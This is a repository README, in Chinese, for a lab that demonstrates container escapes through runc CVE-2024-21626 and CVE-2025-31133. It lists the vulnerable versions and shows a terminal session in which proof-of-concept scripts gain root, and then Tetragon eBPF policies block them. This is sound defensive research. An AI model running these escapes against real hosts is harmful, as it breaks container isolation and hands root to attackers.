scherepiuk/container-escape-ebpf

# 前提条件 - 主机运行存在漏洞的 runc 版本： - 对于 [CVE-2025-31133](https://www.cve.org/CVERecord?id=CVE-2025-31133)：`1.2.7` 及以下版本，`1.3.0-rc.1` 到 `1.3.2`、`1.4.0-rc.1` 和 `1.4.0-rc.2`。 - 对于 [CVE-2024-21626](https://www.cve.org/CVERecord?id=CVE-2024-21626)：`1.0.0-rc93` 到 `1.1.11`。 - 非特权用户能够使用 `runc`（或 containerd 的 `ctr`）通过 OCI 配置文件和普通 rootfs 创建容器。 # 使用方法 ``` you@local:container-escape-ebpf$ make deploy # Setup `aws` CLI with `aws configure` and `terraform/terraform.tfvars` prior to deploying. you@local:container-escape-ebpf$ make ssh # Wait around a minute for the virtual machine to intialize before SSHing. ubuntu@vm:~$ python3 /pocs/cve-2024-21626.py Launched container: 4bvviH3spAXYLNJpoQ7YHlg366eG1mhB ubuntu@vm:~$ ls -la /pwned_by_cve_2024_21626 -rw-r--r-- 1 root root 0 Jan 13 13:49 /pwned_by_cve_2024_21626 ubuntu@vm:~$ python3 /pocs/cve-2025-31133.py Launched container: aeE5aI7Q7aYasXTAy64QKdAIlKMSe19p sh: 1: cannot create /proc/sys/kernel/core_pattern: Read-only file system Exploit did not succeed. Retrying... Launched container: vg4fRLcB87DWxGRGb1lb8mXaIum7mEfQ sh: 1: cannot create /proc/sys/kernel/core_pattern: Read-only file system Exploit did not succeed. Retrying... Launched container: NsaQgj5PYt1qlBmkWtvWJ6R5ZondCjHH Exploit succeeded! ubuntu@vm:~$ ls -la /pwned_by_cve_2025_31133 -rw-r--r-- 1 root root 0 Jan 13 13:52 /pwned_by_cve_2025_31133 ubuntu@vm:~$ /utils/reset.sh ubuntu@vm:~$ sudo systemctl start tetragon ubuntu@vm:~$ python3 /pocs/cve-2024-21626.py runc run failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: permission denied Launched container: Y7VcaVHuPbYoeqERcfFjjQLJxMEo1VPV ubuntu@vm:~$ python3 /pocs/cve-2025-31133.py Launched container: uJdkfzL0feIm6ipPv0PazSUPW6VJ765h sh: 1: cannot create /proc/sys/kernel/core_pattern: Permission denied Exploit did not succeed. Retrying... Launched container: qGKTlsyZ0Hh47DxF1rUIjkBxffLfYUxx sh: 1: cannot create /proc/sys/kernel/core_pattern: Permission denied Exploit did not succeed. Retrying... Launched container: jMrn2W3NLAap6UPA2UB6LQHLLu9yevcO sh: 1: cannot create /proc/sys/kernel/core_pattern: Permission denied bash-5.1# exit exit ubuntu@vm:~$ exit exit you@local:container-escape-ebpf$ make teardown # Don't forget to teardown resources! ```

标签：AWS, CVE-2024-21626, CVE-2025-31133, Docker镜像, DPI, ECS, POC, Python, runc, Terraform, TGT, Web截图, Web报告查看器, 主机逃逸, 子域名枚举, 容器安全, 容器逃逸, 攻防演练, 无后门, 特权容器, 系统安全, 网络安全, 逆向工具, 隐私保护